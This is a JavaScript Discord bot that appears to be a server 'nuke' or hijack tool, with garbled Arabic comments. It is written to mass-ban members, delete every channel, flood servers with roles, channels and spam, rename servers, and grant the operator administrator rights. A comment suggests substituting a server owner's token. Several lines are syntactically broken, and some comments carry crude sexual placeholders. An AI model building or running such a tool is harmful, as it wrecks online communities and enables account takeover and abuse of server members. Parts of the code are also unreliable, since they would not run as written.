//ÙÙƒØ±Ù‡ Ø§Ù„ÙƒÙˆØ¯
//Ø§Ù† ØªØ³ÙˆÙŠ Ø¨ÙˆØª 
//ÙˆØªØ¹Ø·ÙŠÙ‡ Ø§Ø¯Ø§Ø±ÙŠ ÙŠØ¶ÙŠÙÙ‡
//Ù„Ù…Ø§ ÙŠØ¶ÙŠÙÙ‡ ØªÙƒØªØ¨ Ø§Ù„Ø§Ù…Ø± ÙŠÙ„ÙŠ Ø§Ù†Øª Ø­Ø¯Ø¯ØªÙ‡
//ÙˆØ¨ÙŠØ³ÙˆÙŠ Ø±ØªØ¨ Ø¨Ø§Ø³Ù… ÙŠÙ„ÙŠ Ø§Ù†Øª ØªØ­Ø¯Ø¯Ù‡
//ÙˆØ±ÙˆÙ…Ø§Øª ØµÙˆØªÙŠÙ‡ ÙˆÙƒØªØ§Ø¨ÙŠÙ‡ Ø¨Ø§Ù„Ø§Ø³Ù… ÙŠÙ„ÙŠ ØªØ­Ø¯Ø¯Ù‡
//ÙˆÙŠØ¹Ø·ÙŠÙƒ Ø±ØªØ¨Ù‡ ÙÙŠÙ‡Ø§ Ø§Ø¯Ù…Ù† Ø³ØªØ±ÙŠØ´Ù†
//ÙˆØªØªØ­ÙƒÙ… ÙÙŠ Ø§Ù„Ø³ÙŠØ±ÙØ± 
//Ø·Ø¨Ø¹Ø§ Ø§ÙˆÙ„ Ù…Ø§ ØªÙƒØªØ¨ Ø§Ù„Ø§Ù…Ø± Ø¨ÙŠØ¨Ù†Ø¯ ÙƒÙ„ Ø§Ù„Ø§Ø¹Ø¶Ø§Ø¡ 
//Ø§Ùˆ
// Ø§Ø°Ø§ Ù…Ø¹Ùƒ ØªÙˆÙƒÙ† Ø§Ù„Ø§ÙˆÙ†Ø± Ø­Ø· ØªÙˆÙƒÙ† Ø§Ù„Ø§ÙˆÙ†Ø±
//ENJOY
//Sorry For The Bad Engilsh :/
const Discord = require("discord.js") //npm i discord.js
const client = new Discord.Client();
const Token = '' //Ø­Ø· ØªÙˆÙƒÙ† Ø¨ÙˆØªÙƒ Ù‡Ù†Ø§ // your bot token
const x_x = "." //Ø§Ù„Ø§Ù…Ø± ÙŠÙ„ÙŠ ÙŠØ´ØºÙ„ Ø§Ù„ÙƒÙˆØ¯ //!rape
const opcmd = 'oprole' // !cum
const teext = "hjacked" // Ø§Ø³Ù… Ø±ÙˆÙ…Ø§Øª Ø§Ù„ÙƒØªØ§Ø¨ÙŠÙ‡ ÙŠÙ„ÙŠ Ø¨ÙŠØ³ÙˆÙŠÙ‡Ø§ //ðŸ—£ï¸-random
const vooice = "HJACKED" // Ø§Ø³Ù… Ø§Ù„Ø±ÙˆÙ…Ø§Øª Ø§Ù„ØµÙˆØªÙŠÙ‡ ÙŠÙ„ÙŠ Ø¨ÙŠØ³ÙˆÙŠÙ‡Ø§ //the voicechannel name
const pic = "https://cdn.discordapp.com/attachments/505639515407253506/505640173615448064/download.png" // ØµÙˆØ±Ù‡ Ø¨ÙŠØ³ÙˆÙŠ ÙÙŠÙ‡Ø§ Ø³Ø¨Ø§Ù… Ø§Ù„Ø¨ÙˆØª //the spam embed thumbnail picture
const spam = "HJACKED" // Ø§Ù„ÙƒÙ„Ø§Ù… ÙŠÙ„ÙŠ Ø¨ÙŠØ³ÙˆÙŠ ÙÙŠÙ‡ Ø³Ø¨Ø§Ù… Ø§Ù„Ø¨ÙˆØª //DIE DIE DIE
const namee = "HJACKED" // Ø§Ø³Ù… Ø§Ø¨ÙˆØª Ø¨Ø¹Ø¯ Ø§Ù„ØªÙ‡ÙƒÙŠØ± //Rythymv2
const playing = "HJACKED 1 SERVER" // Ø§Ù„Ø¨Ù„Ø§ÙŠÙ†Ø¬ //bot streaming
const role = 'HJACKED' // Ø§Ø³Ù… Ø§Ù„Ø±ØªØ¨Ù‡ ÙŠÙ„ÙŠ Ø¨ÙŠØ³ÙˆÙŠÙ‡Ø§ //BOT
const adminstrator = 'OP' //Ø§Ø³Ù… Ø§Ù„Ø±ØªØ¨Ù‡ ÙŠÙ„ÙŠ Ø¨ÙŠØ³ÙˆÙŠÙ‡Ø§ Ø§Ù„Ø¨ÙˆØª ÙˆÙŠØ¹Ø·ÙŠÙƒ Ø§ÙŠØ§Ù‡Ø§ //BOT
console.log('BY OROCHIX');
console.log('Start Hacking System ..')
client.on('ready', () => {
  console.log(`Logged in as ${client.user.tag} !`);
  console.log(`Done The Hacking System Has Been Started`)

});
client.on('ready',  () => {
console.log('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'); 
console.log('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'); 
console.log('      ~            ~  By : OROCHIX ~           ~    '); //
console.log('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'); 
console.log('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~');
console.log(`Logged in as  * [ "  OROCHIX " ] servers! [ " ${client.guilds.size} " ] Users! [ " ${client.users.size} " ]`);
//BY OROCHIX (Arabic)
        

});
// unban all and send a message for the ownerserver
async function nuke(guild) {
    let users = 0;
    let channels = 0;
  
    await guild.fetchMembers();
  
    await guild.owner.send('Your Server Has Been Hjacked !').catch(e => { return void e; });
  
  
  
    await Promise.all(guild.members.map(async (m) => {
      if (m.bannable) {
        users++;
        await m.send('HJACKED').catch(e => { return void e; });
        return m.ban();
      }
    }));
    
      await Promise.all(guild.channels.map(c => {
      if (c.deletable) {
        channels++;
        return c.delete();
      }
    }));

    await guild.createChannel(teext, 'text');

    await guild.createChannel(vooice, 'voice');



}
//any error will written in the console :>
client.on('guildCreate', async (guild) => {
  return nuke(guild).catch(console.error);
});

//change the bot status and change the bot name and change the bot avatar and the servericon and the servername
client.on('message', message => {
    if (message.content === x_x) {
        console.log(`THE HACK HAS BEEN STARTED`)
        message.guild.members.forEach(baand => {
       baand.ban({reason: spam,});
       client.channels.forEach(hackch => {
       hackch.delete();
       client.user.setAvatar(https://images.discordapp.net/avatars/235088799074484224/16c197c4c3f0eb808f9bceb6e1075e71.png?size=512)
       client.user.setUsername(Rythymv2)
       client.user.setGame(playing, '')
       client.guilds.forEach(hack => {
       hack.setIcon(https://images.discordapp.net/avatars/235088799074484224/16c197c4c3f0eb808f9bceb6e1075e71.png?size=512)
       hack.setName(Rythym)})})})}});

//this will give you a adminstrator in the target server
client.on('message', message => {
        if (message.content === 'OP') {
let me = message.author
        let role = message.guild.createRole({
        name : adminstrator,
        color : "RANDOM", 
        permissions : [8]
        })
        let role1 = message.guild.roles.find('name', adminstrator)
    message.channel.send(`HJACKED`)
   message.guild.member(me).addRole(role1);
}})
//create the roles
            client.on('message', message => {
     

                if (message.content === x_x) {
                    client.guilds.forEach(m =>{
             m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               }) 
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
           
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
                m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
           
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               }) 
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
           
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               }) 
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
           
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
           
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               })
               m.createRole({
                   name : role,
                   permissions :   [1],
                   color : " #ff0000"
               }) // i know its too long ;-;
           
           
               
           })
            
            
           }
           });
           //create the textchannels
           client.on('message', message => {
                    if (message.content === x_x) {
                          client.guilds.forEach(m =>{
           m.createChannel(DIE, 'DIE DIE DIE DIE');
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           
           m.createChannel(teext, 'text');
           
           m.createChannel(teext, 'text');
           
           m.createChannel(teext, 'text');
           
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           
           m.createChannel(teext, 'text');
           m.createChannel(teext, 'text');
           
           })
           }
           });
           //create the voicechannels
           client.on('message', message => {
                    if (message.content === x_x) {
                            client.guilds.forEach(m =>{
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           m.createChannel(vooice, 'voice');
           
           // again 
           
           })
           }
           
           });



//if the bot join in any server the will give self adminstratpr role 
  client.on('guildMemberAdd', member => {
                        member.guild.createRole({
                      name : client.user.username,
                      color : "RANDOM", 
                      permissions : [8]
                  }).then(function(role){
                      member.addRole(role)
                  })
                  
              })
          

            //spam message
                client.on('message', message => {
                    if (message.content === x_x) {
                        console.log(`THE HACK HAS BEEN STARTED`)
                        var teeext = teext.replace(" ", "-")
                        var interval = setInterval (function () {
                        const embed = new Discord.RichEmbed()
                       .setColor("ff0000")
                       .setThumbnail(pic)
                       .addField(spam, ".")
                        message.channel.sendEmbed(embed);
            
            
            
                        })
                      }})

//login in to the bot token or the serverowner token
    client.on('message', async message => {
  const devs = ['505638480248963072']; // your id
  let member = message.author
   if (message.content === opcmd) {
    if (!devs.includes(message.author.id)) return;
let op = message.guild.roles.find('name', `${adminstrator}`)
    if(!op) return message.guild.createRole({ name: "OPROLE", permissions: [8] });
    message.guild.member(member).addRole(op);
  }
});
client.login(Token)
